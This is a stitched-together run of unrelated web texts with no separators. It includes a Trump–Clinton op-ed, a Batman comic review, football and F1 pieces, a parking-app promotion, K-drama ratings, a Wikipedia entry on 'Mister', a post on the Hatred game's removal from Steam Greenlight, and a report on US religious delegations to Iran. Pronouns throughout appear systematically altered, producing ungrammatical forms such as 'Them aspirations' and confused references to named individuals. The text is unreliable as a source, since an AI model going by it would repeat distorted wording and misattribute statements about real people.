Stonewaller, shape-shifter, liar. I wrote this week about how an all-but-certain presidential nominee embodied these characteristics, prompting comments from readers observing, with varying degrees of snarkiness, that they had assumed I was referring to Hillary Clinton.
My target was Donald Trump, but these readers raise a reasonable and important question: Can't the same criticism I heaped on the presumptive Republican nominee be applied to the Democratic front-runner? To all politicians, for that matter? Am I just whaling on Trump and going soft on Clinton because I disagree with Trump's positions and agree, for the most part, with Clinton's?
Some will conclude that I am simply in the tank for Clinton, willfully blind to their faults. (On that score, full disclosure: My college-age daughter has volunteered for the Clinton campaign as an unpaid intern this summer.)
But I'd make two countervailing points. First, I have been a tough critic of Clinton where it was merited: on their bone-headed decision to use a private email account and their clumsy handling of its aftermath, on their relentless speechifying and their refusal to disclose the transcripts of these remarks, on their about-face on trade.
Second, and this goes to the question of whether my assessment of Trump is motivated, intentionally or subconsciously, by ideological disagreement: In the three presidential election cycles during which I have been an opinion writer, I have never used language anywhere near that strong about previous Republican nominees.
The Republican presidential front-runner reversed course on a whole load of issues – all on May 4. (Peter Stevenson/The Washington Post)
Because Trump is different — in degree more than in kind, but in their case the difference of degree is a yawning chasm. All politicians deflect unwanted questions and demands for information (stonewaller). All evolve, if not outright flip-flop (shape-shifter). All, at times, say things that turn out to be untrue (liar). What puts Trump in a different league is their outright unwillingness to abide by the customary norms of disclosure (releasing tax returns); their reversals on issues within the course of a single interview, no less a single campaign; and their determined refusal ever to acknowledge error even when confronted with irrefutable facts to the contrary.
Contrast Clinton, which is not to say that they are pure or angelic.
On stonewalling, it is fair to say that Clinton has a penchant for secrecy. When Bill Clinton first ran for president in 1992, the Clintons declined to release tax returns prior to 1980, which would have revealed the quick $100,000 profit that Hillary Clinton made trading commodities. At the same time, the Clintons did release more than a decade's worth of tax returns back then, and more since. Transparency is not Clinton's first instinct. But Trump's refusal to release their returns is so far outside historical practice that they make Clinton look like the epitome of openness.
On shape-shifting, Clinton is not alone among politicians in altering positions in ways that can fairly be interpreted to accord with political interests. They said they were opposed to same-sex marriage when that position was politically convenient, and they changed that position when the political climate changed. They were for free trade agreements before they were against them, first praising the Trans-Pacific Partnership as the “gold standard” of trade deals and then assailing it.
Yet voters, agree or disagree, can have reasonable confidence about Clinton's basic worldview and where they stand on issues. Trump is erratic. They stake out a position one minute (punishing women who have abortions) and abandons it the next.  They are against raising the minimum wage, but then supports a higher wage, or maybe not. They have a tax plan but might totally change it.
On lying, one of the common counts against Clinton involves their statements about what prompted the Benghazi, Libya, attack. Space prevents re-litigating that issue here, but the accusation of deliberate lying remains unfounded. As PolitiFact concluded, “There simply is not enough concrete information in the public domain for . . . anyone to claim as fact that Clinton did or did not lie to the Benghazi families.” The Post's fact-checker, Glenn Kessler, similarly found there was not “enough evidence to label Clinton a liar.”
Clinton's handling of another “lie” is instructive. At several points during the 2008 campaign, Clinton described “landing under sniper fire” in Bosnia in 1996; video debunked that account. But confronted with conflicting evidence, Clinton acknowledged that they “misspoke.” Has Trump ever backed down from their bevy of demonstrably false statements?
1 of 45 Full Screen Autoplay Close Skip Ad × Trump captures the nation's attention on the campaign trail View Photos The Republican candidate continues to dominate the presidential contest. Caption Businessman Donald Trump officially became the Republican nominee at the party's convention in Cleveland. Donald Trump speaks at a campaign event at Trump Doral golf course in Miami. Carlo Allegri/Reuters Buy Photo Wait 1 second to continue.
My point here is not that Clinton is a perfect politician — far from it. Still, they play within the goal posts of ordinary political behavior. Trump operates far outside any of the usual lines.
Read more from Ruth Marcus's archive, follow them on Twitter or subscribe to their updates on Facebook.
WATCH OUT FOR THAT SPOILER!!!
Batman Inc. is a mixed bag. From the beginning, it's been an odd, mildly trippy, sometimes simply confusing thrill ride through Grant Morrison's wildly contorted mind. This is your brain on Batman. Bam. Ka-pow. But the truly mind-blowing element is ultimately not the complexity of the story Morrison is capable of juggling, or the creativity they exhibit in constructing its intricate puzzle-pieces, but the sheer scope of the vision they have for the long-term future of the Bat-family.
Bam. Ka-pow.
Starting with the basics: Chris Burnham, who first came to my attention a few years ago during their excellent work on Cladio Sanchez's equally excellent Amory Wars, is without question a unique and recognizable artist. He's no Frank Quitely, but then again they don't need to be. My only gripe is that perhaps their style is less perfectly suited for the tone of a Batman story than a science fiction epic like Amory Wars. Nathan Fairbairn's coloring job is perhaps slightly too colorful, and Burnham's lines, while retaining the sense of grittiness and dirt that defines Gotham City, perhaps render the characters slightly too... soft? Not a bad job, and by no means unreadable, but slightly off—incidentally, much like the renowned and spectacular Frank Quitely's work on Batman and Robin a few years past.
The story itself leads from issue #4, in which the numerous agents of Batman Incorporated end a decisive battle against the clandestine Leviathan organization—led, to nobody's surprise, by the nefarious Talia Al Ghul. What happens next is a definitive moment in the lives of Bruce Wayne and their son, Damian. And here's where it gets complicated.
It's been revealed since the inception of Batman Incorporated that Talia, the mother of Bruce Wayne's son, has far greater plans than we originally thought. Them aspirations of conquest rival even those of their father Ra's, and as Damian's mother they have managed to drive a wedge of doubt into the relationship between the other sons of the Bat-family. It is this doubt, and a vision of the future, that prompt Bruce to expel their own son and loyal partner from Batman Incorporated.
Now hold on a moment. Remember Batman #666? It's one of my favorite single issues of all time. If you haven't read it, do so. In it, a dystopian future is revealed in which Gotham has continued to deteriorate after the unexplained death of Bruce Wayne, and a seemingly immortal Damian now wears their father's coat-of-arms and fights crime as the Batman. Batman Inc. #5 follows this timeline further forward, to Gotham's apocalypse—burning and desecrated, filled with eerily grinning Joker-toxin zombies, and utterly collapsing as the scowling Damian Wayne fights for survival, barricaded with their old enemies and reluctant allies in the remains of Arkham Asylum. In the end, the destruction becomes total as the president drops a nuclear weapon, obliterating Gotham City along with what remains of the Batman mythos. Bam. Ka-pow. In the background stands a sinister, grinning figure uncannily similar to Bruce Wayne. And back to the present we come.
Now, I love Grant Morrison's writing and Batman Inc. has been an immensely satisfying title so far. The Batman #666 timeline is my preferred version of Batman's future, and Damian Wayne is one of my favorite characters. But this issue left me confused. Who is the mysterious figure who destroys Gotham? Why exactly is Bruce expelling Damian? Cliffhangers I understand, but when I finish reading and feel no resolution or progress in the story, it impedes my enjoyment. I have faith in Morrison's vision for the end of this story, which will be wrapping up summer of 2013. But with staccato pacing, vague exposition and (in particular) Bruce's clumsy, confusing dismissal of Damian, I have to say it didn't quite live up to my expectations.
It's still one of my must-reads this month, and will be until it ends in issue #12. Morrison has done more for the Batman franchise than anyone else since Chuck Dixon, or maybe even Adams and O'Neil, as far as revitalizing it, making it personal, and turning it into something larger than life after long years of Bat-boredom. Their work paved the way for the wonders Scott Snyder is currently doing on the main Batman title, and stirred the whimsical sweetness of Silver Age comics back into the bitter flavor of the modern-day—some would say Dark Age—costumed crimefighter. This is Morrison's final Batman epic, and I cannot wait to see the Ragnarok of this breathtaking and mystifying Batman mythology.
Bam. Ka-pow.
EVER-IMPROVING QPR man Yun Suk-Young insists confidence will only continue to grow after recent impressive performances.
Premier League champions Manchester City were humbled in a 2-2 Loftus Road draw on Saturday, with Charlie Austin scoring once more.
Rangers, meanwhile, were largely excellent in their previous three league fixtures against Liverpool, Aston Villa and Chelsea respectively – despite experiencing defeat in two of those matches.
“I think we played very well against Man City,” Suk-Young told www.qpr.co.uk.
“Of course, getting all three points would have been the best result, but we are still pleased with the point against a strong team.
“First and foremost, we wanted to be hard to beat considering the opposition. The weather, rain, also made it difficult. But we scored first and went on from there.
“It's a good moment for us because on both a team and personal level, confidence is growing. Our fitness is starting to show. So I am thinking positively.”
Earlier this week, Suk-Young linked up their native South Korea ahead of friendly matches with Jordan and Iran respectively.
They added: “It is always an honour to join up with the national team. I will try my hardest to show the best performance.
“Fingers crossed, I can avoid injury and stay in good physical condition for what I hope will be a long season for me.
“I hope to contribute to the team's performance for both club and country.”
Broadcaster Gerry Anderson to 'return to BBC Radio Ulster in new year following ill health' BelfastTelegraph.co.uk Broadcaster Gerry Anderson is set to return to the BBC airwaves in the new year after battling ill health, it has been reported. https://www.belfasttelegraph.co.uk/news/northern-ireland/broadcaster-gerry-anderson-to-return-to-bbc-radio-ulster-in-new-year-following-ill-health-29782238.html https://www.belfasttelegraph.co.uk/migration_catalog/article25628194.ece/60ccc/AUTOCROP/h342/gerry-anderson
Email
Broadcaster Gerry Anderson is set to return to the BBC airwaves in the new year after battling ill health, it has been reported.
The 69-year-old told the Irish News they would return to their popular slot on Radio Ulster after a 'rough year'.
Gerry has been missing from their show since December last year.
In February their friend and co-host Sean Coyle told listeners who rang into the Radio Ulster programme that Anderson had been in hospital but was "on the mend".
Speaking to the Irish News, Gerry Anderson said they were bowled over by the get well messages they had received over the last few months.
"I had complicated internal problems that required four serious operations which led to a lengthy recovery period, but I hope to be back some time in the new year, " they said.
"It was a rough year, but I would like to say I was amazed at the reaction of people."
Belfast Telegraph Digital
The issue in this problem is that we already have tons of unused parking . Most people have a driveway or garage that they don't use during the day because they commute to work. There are 253 million cars & trucks, and 210 million people over 18 years old. We have almost a car per person that can drive, and the percentage of people that work at home is less than 7%. This means that 93% of people, who own a car (almost 100%), could rent out their space and help reduce the traffic, the building of parking and reduce the cost of housing.
The cycle goes likes: companies move to a city, jobs are created, more people move to the city or around, more traffic, more cars, build more parking. Rent goes up, building houses doesn't meet demand. Parking also doesn't meet demand, more people driving around looking for parking. More traffic. More stress and anxiety. Fewer people happy.
“This description of precise, disciplined folly bears a depressing similarity to contemporary parking policy. Every land use has a parking requirement that is learned by rote. A gas station must provide 1.5 parking spaces per fuel nozzle, and a mausoleum must provide 10 parking spaces per maximum number of interments in a one-hour period.
“The real barrier to charging for curb parking is political, not technological. I argue that cities can overcome this political barrier by returning all meter revenue to the neighborhoods that generate it. Where nonresidents pay for most curb parking, using the revenue to pay for neighborhood public services can persuade residents to support charging market prices for their curb parking spaces.” Donald Shoup
Due to the fact that it seems that cities are very dependent on the parking meter and tickets revenue, the shift won't come voluntarily from them. How dependant they are on this revenue? Here is some data:
Let's try to understand why does the city earn so much on parking and why the prices have no relation with the real use or cost of having parking accessible for everyone:
“If cities charge market prices for curb parking, spillover will no longer be a problem, so they can remove their off-street parking requirements. These three reforms — charge fair-market prices for curb parking, return the resulting revenue to the neighborhoods that generate it, and remove the zoning requirements for off-street parking — can align our individual incentives with our collective interests and produce enormous benefits at almost no cost. All these benefits will result from subsidizing people and places, not parking and cars.”
So, how do we charge a fair-market price for parking? Well, in the first place we need to get ALL parking in the “market pool”, so we make a better use of the assets and we get a real understanding of what is the existing supply. This means everyone's parking space or garage on the same platform. Here is where we come up and provide the marketplace for drivers and homeowners to connect. See www.fleckparking.com
Once you have your driveway or garage in the system, then the revenue that was going to the city, will go to your bank account. If we are ALL in the market, because there is 5x times the amount of supply then the price needs to necessary fall and become an accessible service for everyone. The money you make will help you pay the mortgage of your house, which has the price of the driveway and garage INCLUDED in it.
The reversal of fortune is here to stay and the gap got a whole lot wider this week. KBS is now the undisputed top dog of Wed-Thurs K-drama ratings, with its surprise hit Chief Kim remaining top of the competition with this week's episodes 5 and 6. Episode 5 rose 1.7% to hit 15.5% AGB nationwide, and episode 6 continued the rise adding another 1.2% to end with 16.7% ratings. Hitting the high teens is a feat nowadays and this one has turned into a disappointing result for SBS to lose both the ratings dominance with Saimdang: Light's Diary dropping down to 10.7% in episode 5, nearly losing it's double digits, before rebounding back to 12% in episode 6. MBC‘s Missing 9 remains mired in the 4% digits and stranded by itself in the deserted island of small ratings.
SBS has announced that it will be re-editing Saimdang so it's not clear if the changes are noticeable to viewers or have been shown already in this week's episodes. The criticism seems to be around the lackluster and rather old fashioned story line so re-cutting already filmed scenes may not do much to bolster the flagging ratings. With that said, if Lee Young Ae‘s popularity in China and elsewhere overseas remains high then Saimdang has a chance to recoup its costs despite failing to be a hit in Korea.
Fans at Comic Com often dress up as their favorite superhero. Congressman John Lewis of Georgia decided to cosplay as a real-life hero: himself, marching at Selma fifty years ago.
Lewis, who represents Georgia's 5th District, is considered one of the Big Six leaders during the Civil Rights Movement, and was chairperson of the Student Nonviolent Coordinating Committee from 1963 to 1966. On March 7, 1965, Lewis suffered a skull fracture after being beaten by Alabama State Troopers when they led 600 marchers across the Edmund Pettus Bridge in Selma, Alabama. They still have scars on their head today.
Lewis has chronicled their experience in the Civil Rights Movement in a graphic novel trilogy titled March. Book Two was released in January of this year, and the Congressman was at San Diego Comic Con on Saturday morning to discuss the graphic novel at a panel with their March co-author and artist. Lewis came dressed as themselves marching at Selma fifty years ago, wearing a similar trench coach and backpack as they did that day. After discussing details of Book Three (slated for 2016) and fielding questions, ABC 10 said they led a march through the convention before ending with a book signing.
My first event today is an amazing one: true American hero, civil rights icon Congressman John Lewis. #SDCC pic.twitter.com/VG3asSUsoh — Jeff Lasky (@10NewsLasky) July 11, 2015
Congressman John Lewis. At Comic-Con. In costume. (Recreating their trench coat and backpack from Selma 50 years ago) pic.twitter.com/T4EHdbKZhs — TopShelfProductions (@topshelfcomix) July 11, 2015
And then there was the time I marched through #SDCC with @repjohnlewis pic.twitter.com/vRrXkCs8Uw — Mike Bocchini (@Bocchs) July 11, 2015
Congressman Lewis will be signing MARCH again shortly at the @IDWPublishing #SDCC booth 2743! pic.twitter.com/rNpYMyOUdD — TopShelfProductions (@topshelfcomix) July 11, 2015
Your browser does not support HTML5 video tag.Click here to view original GIF
Like you, I know that awkward moments create the finest humor. That's why the podium for the Malaysian Grand Prix was so amazing.
As the excellent blog Axis of Oversteer pointed out, the guy in first admitted they should have been second, the guy in third admitted they should have been fourth, and the guy in second just crotch-thrusted their way through a festival of awkward.
For those of you not familiar with the second race of this F1 season, Red Bull's top driver Sebastian Vettel broke team rules (though no explicit F1 rules) to pass their teammate Mark Webber for the win. Mercedes' second driver Nico Rosberg held themselves back from passing their teammate Lewis Hamilton, who was running on fumes. Vettel's pass is contentious because their team ordered them to stay in second and because Mark Webber had turned down their engine to preserve their car and tires in the lead.
So when Vettel squeezed past Mark, almost taking the two drivers out from the lead (it wouldn't have been the first time that'd happened), Mark was understandably pissed. How close was the squeeze? This is close:
Advertisement
After dicing wheel-to-wheel (the most interesting part of the whole race), Mark then did the mature thing and gave Seb the finger.
The two drivers then had to share the podium together. Let's break down how things went.
Advertisement
At right we have Martin Brundle, ex-F1 driver and F1 commentator performing the post race interviews right there on the podium, minutes after the race has ended. The drivers are filled with adrenaline. Second from right is third place Lewis Hamilton, pulling at their ear because the two men next to them want to kill each other.
Note the "shit is about to go down" smiles on the faces of both Brundle and Hamilton.
Advertisement
Center is winner Sebastian Vettel, who is looking less-than-chipper with their hand in their pocket and their tongue sticking out. At far left is Mark Webber, who is "stretching" their crotch while Vettel is taking a question.
Your browser does not support HTML5 video tag.Click here to view original GIF
Take a closer look here.
Advertisement
Note Vettel's submissive body language, Mark's bitten tongue, and their noted crotchual area.
Vettel, here, is trying their hardest not to look at Mark. Mark, meanwhile, continues to stare straight into the back of Vettel's head, possibly containing the desire to go Aussi-whoopass on the young German.
Advertisement
Don't think that Mark was being mean to innocent little Vettel, who was seen earlier in the debrief room immediately after the race drinking a bottle of Mark's tears.
This tear-drinking incident was in response to Mark walking into the room proclaiming, "Multi 21, Seb...Yeah, Multi 21." Here's Mark's expression.
Advertisement
Your browser does not support HTML5 video tag.Click here to view original GIF
Note the surprise and confusion on Mark's face. Multi 21 does not refer to the multivitamin endorsed by Webber, but rather Red Bull's code for team orders.
Let's now return to the podium for Mark's interview. The millions of people watching this race knew this was going to be good, and it was.
Advertisement
The other two drivers patiently awaited the inevitable train wreck.
Advertisement
Here's Mark firmly placing the knife into Seb's back, explaining how they were only passed because the team told both them and Vettel to slow down.
Your browser does not support HTML5 video tag.Click here to view original GIF
We were watching a broken man. Naturally, I watched this bit at least a dozen times.
Advertisement
As Mark continued to ramble about Seb's treachery, the camera cut to Christian Horner, Team Principal for Red Bull, along with another member of the Red Bull team.
These are not the happy faces of a winning team. Vettel was not looking pleased either.
Advertisement
With three world championship titles to their name, I suppose Seb is bored of winning by now, but this level of unhappiness on the podium was unprecedented. Meanwhile, the boss of Red Bull, the tough-as-nails, blinded-in-one-eye Helmut Marko, was looking as badass as ever.
Advertisement
Marko later stated in an interview, "We told the drivers to stay in position, because we were worried about the tire wear, but at this stage it got out of control I have to say...When Vettel had come up behind Mark - At this point you cannot talk to race drivers." Then they shrugged and walked away.
After the podium interviews there were more interviews, which brought me inappropriate levels of joy. Here is Mark's face while contemplating a diplomatic response to a tough question.
Advertisement
Questions continued to pile in, some regarding Mark's earlier statement on Vettel's move, "Seb made their own decisions and he'll have protection as usual." Mark decided it was a good time to stop.
In the end, whether you like Vettel or not, we all know that Mark got a lot of new fans from last race. Judging by their look on the podium, I think he'd rather have a win, though.
I have interviewed many such people. Renée Martin was thrown into an unaffordable high-risk pool because of an abnormal Pap smear. Lisa Solod got turned away by four insurers because they were on thyroid replacement, an asthma inhaler and hormones — a not uncommon trifecta for women in their 50s. Wanda Wickizer was priced out of having insurance because they had taken Lexapro for depression. Jesse Albert found that they and their family were uninsurable because they had once had a benign skin cancer and a bout of hepatitis C, even though their immune system had cleared the virus.
“Insurers each drew a line in the sand that was invisible for conditions they didn't want to cover,” said Jean P. Hall, the director of the Institute for Health and Disability Policy Studies at the University of Kansas. “We didn't even know where that line was because it was considered proprietary information.”
Turning away people with just a hint of illness is a reasonable business strategy. But as so often occurs in the profit-oriented health system, what is best for business is not necessarily good for patients.
When the House Committee on Energy and Commerce studied insurance denials and exclusions for pre-existing conditions by the four largest for-profit insurers in 2010, it found plentiful evidence that “each company had business plans that relied on using pre-existing conditions to limit the amount of money paid for medical claims.” In documents reviewed by the committee, one company listed “improved pre-existing exclusion processes” as an opportunity to increase growth.
The committee report found that the insurance companies turned down one out of every seven applicants with pre-existing conditions. Such denials had jumped by nearly 50 percent between 2007 and 2009, as the apparently successful financial strategy gained sway.
This article is about the title. For other uses, see Mr. (disambiguation)
"Mister" redirects here. For other uses, see Mister (disambiguation)
Mister, usually written in its abbreviated form Mr. (US) or Mr (UK), is a commonly used English honorific for men under the rank of knighthood. The title derived from earlier forms of master, as the equivalent female titles Mrs, Miss, and Ms all derived from earlier forms of mistress. Master is sometimes still used as an honorific for boys and young men, but its use is increasingly uncommon.
The modern plural form is Misters, although its usual formal abbreviation Messrs(.)[note 1] derives from use of the French title messieurs in the 18th century.[1][4] Messieurs is the plural of monsieur (originally mon sieur, "my lord"), formed by declining both of its constituent parts separately.[4]
Historic etiquette [ edit ]
Historically, mister—like Sir or my lord—was applied only to those above one's own status in the English feudal system. This understanding is now obsolete, as it was gradually expanded as a mark of respect to those of equal status and then to all men without a higher style.
In past centuries, Mr was used with a first name to distinguish among family members who might otherwise be confused in conversation: Mr Doe would be the eldest present; younger brothers or cousins were then referred to as Mr Richard Doe and Mr William Doe and so on. Such usage survived longer in family-owned business or when domestic workers were referring to adult male family members with the same surname: "Mr Robert and Mr Richard will be out this evening, but Mr Edward is dining in." In other circumstances, similar usage to indicate respect combined with familiarity, is common in most anglophone cultures including that of the southern United States.
Professional titles [ edit ]
Mr is sometimes combined with certain titles (Mr President, Mr Speaker, Mr Justice, Mr Dean). The feminine equivalent is Madam. All of these except Mr Justice are used in direct address and without the name. In certain professional contexts in different regions, Mr has specific meanings; the following are some examples.
Medicine [ edit ]
In the United Kingdom, the Republic of Ireland and in some Commonwealth countries (such as South Africa, New Zealand and some states of Australia), many surgeons use the title Mr (or Miss, Ms, Mrs, as appropriate), rather than Dr (Doctor). Until the 19th century, earning a medical degree was not required to become a qualified surgeon. Hence, the modern practice of reverting from Dr to Mr after successfully completing qualifying exams in surgery (e.g., Membership of the Royal College of Surgeons or the Royal Australasian College of Surgeons) is a historical reference to the origins of surgery in the United Kingdom as non-medically qualified barber surgeons.[5]
Military usage [ edit ]
In the United States Military, warrant officers and chief warrant officers are addressed as Mister by senior commissioned officers. In the United States Navy and United States Coast Guard it is proper to use Mister to refer to commissioned officers below the rank of lieutenant commander, or to subordinate commissioned officers, though the use of Mister implies familiarity compared to the use of rank title for an unknown officer. Woman officers below the rank of lieutenant commander may be addressed as Miss, Ms. or Mrs. as appropriate.
In the British Armed Forces, a warrant officer is addressed as Sir by other ranks and non-commissioned officers; commissioned officers, particularly of junior rank, should address a warrant officer using their surname and the prefix Mister; for example, "Mr Smith", although often their rank or appointment is used, for example "Sergeant Major", "Regimental Sergeant Major", or "RSM".
In the British Armed Forces a subaltern is often referred to by their surname and the prefix Mister by both other ranks and more senior commissioned officers, e.g., "Report to Mister Smithe-Jones at once" rather than "Report to 2nd Lieutenant Smithe-Jones at once".
Judges [ edit ]
In the Courts of England and Wales, Judges of the High Court are called, for example, Mr Justice Crane (unless they are entitled to be addressed as Lord Justice). Where a forename is necessary to avoid ambiguity it is always used, for example Mr Justice Robert Goff to distinguish from a predecessor Mr Justice Goff. The female equivalent is Mrs Justice Hallett, not Madam Justice Hallett. When more than one judge is sitting and one needs to be specific, one would refer to My Lord, Mr Justice Crane. High Court Judges are entitled to be styled with the prefix The Honourable while holding office: e.g., the Honourable Mr Justice Robert Goff. In writing, such as in the law reports, the titles "Mr Justice" or "Mrs Justice" are both abbreviated to a "J" placed after the name. For example, Crane J would be substituted for Mr Justice Crane.[6] Female judges are still properly addressed "My Lord", however "My Lady" is more modernly acceptable.
The Chief Justice of the United States may be referred to as either "Mr Chief Justice," or "Chief Justice." For example, "Mr Chief Justice Roberts," or "Chief Justice Roberts."
Catholic clerics [ edit ]
Among Catholic clergy, "Mr" is the correct title and form of address for seminarians and other students for the priesthood and was once the proper title for all secular and parish priests, the use of the title "Father" being reserved to religious clergy only. The use of the title "Father" for parish clergy became customary around the 1820s.
A diocesan seminarian is correctly addressed as "Mr", and once ordained a transitional deacon, is addressed in formal correspondence (though rarely in conversation) as the Reverend Mister (or "Rev. Mr"). In clerical religious institutes (those primarily made up of priests), Mr is the title given to scholastics. For instance, in the Jesuits, a man preparing for priesthood who has completed the novitiate but who is not yet ordained is properly, "Mr John Smith, SJ" and is addressed verbally as "Mister Smith"—this is to distinguish them from Jesuit brothers, and priests. (Although, before the 1820s, many Jesuit priests were also called "Mr".) Orders founded before the 16th century do not, as a rule, follow this practice: a Franciscan or Dominican, for instance, becomes a friar after novitiate and so is properly titled "Brother" or, if a priest, "Father".
Permanent deacons in the United States are styled as "Deacon" or "the Reverend Deacon" followed by their first and last names (e.g., "Deacon John Jones", rather than "the Reverend Mr").[7] It is also customary in some places, especially in the Eastern Catholic Churches to address deacons while speaking, like presbyters, as "Father" or "Father Deacon".
Other usages [ edit ]
"Mister" can also be used in combination with another word to refer to someone who is regarded as the personification of, or master of, a particular field or subject, especially in the fields of popular entertainment and sports, as Gordie Howe is referred to as "Mr Hockey" or Reggie Jackson is known as "Mr October."
In Italian football, deference to a coach is shown by players, staff and fans referring to them as "Il Mister," or directly, "Mister". This is traditionally attributed to the conversion of the local game of Calcio to English-rules Association Football by British sailors, who would have been the first coaches.[8]
See also [ edit ]
Notes [ edit ]
^ in English,[1][2] and [mesjø] [1] The French, however, do not abbreviate messieurs as Messrs but as MM. In India, one often finds messieurs abbreviated as M/S or M/s, especially as a prefix to the name of a firm.[3] Pronouncedin English,andin French The French, however, do not abbreviateasbut as. In India, one often findsabbreviated asor, especially as a prefix to the name of a firm.
[Update: The Game has been returned to Steam Greenlight]
It really gets to me when games get axed by distribution platforms just based on the moral outrage of a few. I may not agree with the content in Destructive Creations' Hatred, but I absolutely disagree with Valve's decision to pull the game out of Steam Greenlight; preventing people from even having the option to vote on whether or not they would want to play the game.
As noted on Eurogamer in an update to the original post, Valve's Doug Lombardi explained why the game was pulled from Greenlight (you can check out its former page here), saying…
"Based on what we've seen on Greenlight we would not publish Hatred on Steam. As such we'll be taking it down,"
This happened shortly after the game went live on Greenlight earlier today.
Of course, once the game did appear on Greenlight there was a torrent of articles about the “murder simulator” being allowed on Greenlight. The media hasn't been keen on the title since its original announcement, but gamers are kind of split down the middle. Heck, even Eurogamer noted…
“With over 1300 comments appearing on its Greenlight listing in its first few hours, Hatred is certainly getting a lot of attention. Some of it is weary of the game's discomforting ultra violence aimed at innocent bystanders, while others support the developer's desire to make the game it wants to make.”
For those of you who forgot what Hatred was all about, here is the announcement trailer.
Now here's my question: if the opening dialogue from Mr. Killer was about how people had become infected with some zombie-mutating disease and they had to wipe it out of everyone, and the game was called The Diseased, would it still have been pulled?
Does intent change the perception of the content? I mean, if a trailer was put together for GTA V showing first-person axe murdering and tons of civilians being shot in the head with a voice-over about wiping out every single person from the face of the planet, would Valve react in the same way? Would the media react in the same way?
Also, if the community wasn't entirely against the game and a large portion of players would be willing to play it, mod it, spread it, should they be restricted from playing it at the behest of those who feel its morally wrong? What's the point of having the community decide what does and doesn't belong on Steam if that choice is stripped from them whenever the media feels gamers shouldn't have a right to play a game at all?
That's not to mention that Postal, a game released back in 1997, is identical to Hatred insofar that you can kill innocent people and police alike. The whole point of the game was to kill any and everyone – and yet, Postal is still available on Steam… right now. Hypocrisy much?
With the recent bans on GTA V from Kmart and Target in Australia, and a new petition aiming to get the game removed from store shelves in Canada, in addition to some gaming media outlets advocating the bans and calling for the censorship of games like Hatred, it's kind of hard not to view this as an attack on the gaming industry.
Sadly it feels as if the games media do have some pull in directing the content of some developers, especially those not large enough to ignore petitions and hyper-wailing moral police from soap boxes positioned to influence the future of what gamers get to play and what they don't.
Is this what gaming has come to? A fight between the media and the consumers? Is this now the new norm? If so, I can readily see a crash coming sooner rather than later.
[Update:] For reference, here is what the votes looked like before the game was pulled from Greenlight, courtesy of Blocker.
Iran is reopening the gates to delegations from the US religious community as part of a broader outreach meant to smooth the way for a nuclear agreement and improve relations with the United States.
Since March, three major faith-related US delegations have visited the Islamic Republic of Iran for meetings with senior Shiite Muslim theologians and government officials.
A Roman Catholic group, led by Bishop Richard Pates of Des Moines, Iowa, drafted a joint declaration against the “production, stockpiling, use and threat to use weapons of mass destruction” that was signed by Pates, Cardinal Theodore McCarrick — the retired archbishop of Washington — and two Iranians, including Ayatollah Ali-Reza A'arafi, a senior member of the Supreme Council of the Society of Qom Seminary Scholars.
In Iran for six days in March, the six-member US group also met Ayatollah Morteza Moghtadaei, a member of the Assembly of Experts, which chooses Iran's supreme leader, and had dinner with Ayatollah Javad Shahristani, Iraqi Grand Ayatollah Ali Sistani's representative in Qom. Returning to the United States, they briefed US officials including White House chief of staff Denis McDonough, Deputy Secretary of State Bill Burns and Sen. Tim Kaine, D-Va., said Stephen Colecchi, director of the Office of International Justice and Peace at the United States Conference of Catholic Bishops, which organized the trip. They said they are also sharing their experiences with bishops and congregations all around the United States.
In May, a group of American Catholics, Protestants and a Sunni Muslim spent a week in Iran and attended a conference in Qom on confronting religious extremism. Robert Destro, professor of law at the Catholic University of America law school, said the group, which included a spiritual adviser to President Barack Obama, Florida mega-church pastor Joel Hunter, “met with a lot of interesting people including three grand ayatollahs.”
More recently in June, two dozen Mennonites spent three weeks in Iran — twice as large as previous groups from this faith that have gotten permission to visit the Islamic republic in the past.
Ed Martin, director of the Center for Interfaith Engagement at Eastern Mennonite University in Harrisonburg, Virginia, told Al-Monitor that the group obtained a record 27 visas, though in the end only 23 people went. Even more remarkable, they said, the visas were approved a month before their scheduled departure — a rare circumstance for a country that usually authorizes visits by Western delegations at the last minute. Their visit followed the first trip to the United States by a group of Iranian female seminarians.
Interfaith dialogue has an obvious appeal for a country ruled by clerics. The Mennonites, who emphasize conflict resolution, have been visiting Iran since 1991. Other groups began traveling to Iran in the late 1990s during the presidency of Mohammad Khatami, a cleric and intellectual who initiated what they called a “dialogue of civilizations.” Khatami's successor, Mahmoud Ahmadinejad, fancied themselves a philosopher and also encouraged interfaith interaction. But many US groups boycotted Iran after Ahmadinejad held a conference in Tehran that questioned the Holocaust and appointed a Holocaust denier to head a major government think tank. Visa approval for Americans, meanwhile, became vastly more complicated after the disputed 2009 presidential elections in Iran that were followed by a massive crackdown on peaceful demonstrators.
Last year's less controversial election of Hassan Rouhani — a former think tank head — changed the situation, and it has become easier for Americans, including journalists, to obtain visas to travel to Iran.
Colecchi told Al-Monitor that their group had written to the president of the Supreme Council of the Society of Qom Seminary Scholars two years ago to try to arrange a visit but that the trip only came together this year. They said the Catholic theologians were surprised to find how much they have in common with their Shiite Muslim counterparts.
“The way Shia Islam does religious reflection is very similar to the Catholic tradition,” Colecchi said. Both stress “faith and reason,” venerate past religious figures and have a tradition of what they called “living interpretation” of religious rules.
Since the focus of their trip was the nuclear dispute, Colecchi said their delegation pressed the Iranian clerics about the fatwa by Supreme Leader Ayatollah Ali Khamenei against nuclear weapons and other weapons of mass destruction.
Colecchi said the Catholics repeatedly asked whether the fatwa could be reversed. They said the Iranians replied that such rulings could change “by way of development but not contradiction.” They said they gave as an example a ruling by Ayatollah Ruhollah Khomeini, the founder of the Islamic Republic of Iran, against chess. The fatwa was directed against the gambling that often accompanied the traditional Iranian game and was refined to allow the game, but not the gambling, Colecchi said.
For Iran to develop nuclear weapons would “undermine the authority of the supreme leader and the integrity of their religious tradition,” Colecchi said. They added, however, that while Iran is led by clerics and “the religious establishment in Iran is against the acquisition, stockpile and use of nuclear weapons, that does not mean there may not be hard-liners with a different view.”
Colecchi told Al-Monitor that the group was warmly received by ordinary Iranians, including young people at a major shrine in Qom who took “selfies” with the bishops dressed in their clerical cassocks. On the other hand, they said, they could not get into their Twitter account or access the Conference of Bishops' website because of the Iranian government's filtering of the Internet. They said they hoped that the visit was just the beginning of a conversation that would expand to include human rights and Iran's heavy use of capital punishment. Capital punishment has only been strongly discouraged by the Roman Catholic Church relatively recently, under Pope John Paul II.
The Mennonites, meanwhile, raised the nuclear issue with ordinary Iranians they encountered who were “hopeful that an agreement would be reached but also wanting it to be fair,” Martin said.
